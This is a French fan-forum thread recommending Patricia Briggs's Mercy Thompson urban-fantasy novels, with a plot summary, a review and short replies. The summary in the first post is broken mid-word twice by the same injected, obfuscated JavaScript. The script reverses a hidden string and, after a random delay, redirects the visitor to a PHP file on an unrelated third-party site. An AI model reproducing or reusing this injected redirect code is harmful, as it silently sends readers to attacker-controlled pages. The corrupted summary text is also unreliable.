Mercedes Thompson

Pour discuter de vos livres favoris
Répondre
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Mercedes Thompson

Message par yami627 »

Je vais vous faire lire moi MOUAHAHAHAHA!!

Auteur : Patricia Briggs
Edition : Milady
Genre : Urban-fantasy
5 Tomes sortit en france (un 6ème en cours) et un comics

Image

Résumé : " Les loups-garous peuvent être dangereux si vous vous mettez en travers de leur chemin. Ils ont un talent extraordinaire pour dissimuler leur véritable nature aux yeux des humains. Mais moi, je ne suis pas tout à fait humaine. "
En effet, Mercy Thompson n'est pas une fille des plus banales. Mécanicienne dans le Montana, c'est une dure à cuire qui n'hésite pas à mettre les mains dans le cambouis et à sortir les griffes qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and le danger frappe à sa porte. Mais ce n'est pas tout : son voisin très sexy est le chef de meute d'une b$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de loups-garous, le minibus qu'elle bricole en ce moment appartient à un vampire, et la vieille dame très digne qui lui rend visite vient jeter des sorts sur son garage. Au cœur de ce monde des créatures de la nuit, Mercy se trouve mêlée à une délicate affaire de meurtre et d'enlèvement...

Mon avis : L'auteur à écrit cette série à la première personne, ce qui rend l'histoire très agréable à lire (enfin, pour une fille puisque nous sommes dans la peau d'une héroïne :p)
Mercedes est une héroïne incroyablement drôle et attachante et l'univers mélangeant vampire, loup-garous, feas et autres créatures est très réussi.
Ne vous en fait pas, ce ne sont pas des loups-garous maladroits qui se prennent des portières de voitures dans la gueule, ni des vampires qui brillent comme des diamants 24 carats XD. L'auteur respecte assez les divers folklore propres à chaque races et nous explique, en détails, au fils des tomes, leurs organisation hiérarchique.
Modifié en dernier par yami627 le 17 avr. 2011, 15:31, modifié 1 fois.
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Mercedes Thompson

Message par Septine Madrona »

J'avais déjà vu ce livre mais je ne connaissais pas l'histoire. ça a l'air plutôt sympa, mais j'ai l'impression qu'il y a un petit côté "ado". Mais bon je peux me tromper.
En fait, ça fait une impression de déjà vu, il y a pas mal d'autres livres qui parlent de vampires et de loups-garous. Mais peut-être que celui-ci sort du lot, après je ne l'ai jamais lu donc je peux pas juger.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Mercedes Thompson

Message par yami627 »

si ca peut te rassurer, il ne figure pas sur le même rayon que twilight XD

Malgré le dessin (qui, je suis d'accord fait assez addos lol) l'histoire est plus pour adulte : Il y as des combats, des morts, du sang (forcément lol) et même un peu d'érotisme vers les derniers volumes huhu (je vous dirait pas entre qui et qui :p)

et puis ca fait du bien de lire une VRAI histoire de vampire et de loup-garous. J'ai été déprimé depuis qu'ils sont "à la mode" à cause de la sortie de Twilght mais la saga de Mercedes (et une autre que je vais vous présenter également :p) m'ont redonné le moral.
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Mercedes Thompson

Message par Septine Madrona »

Ok merci pour les précisions ;)
Image
Répondre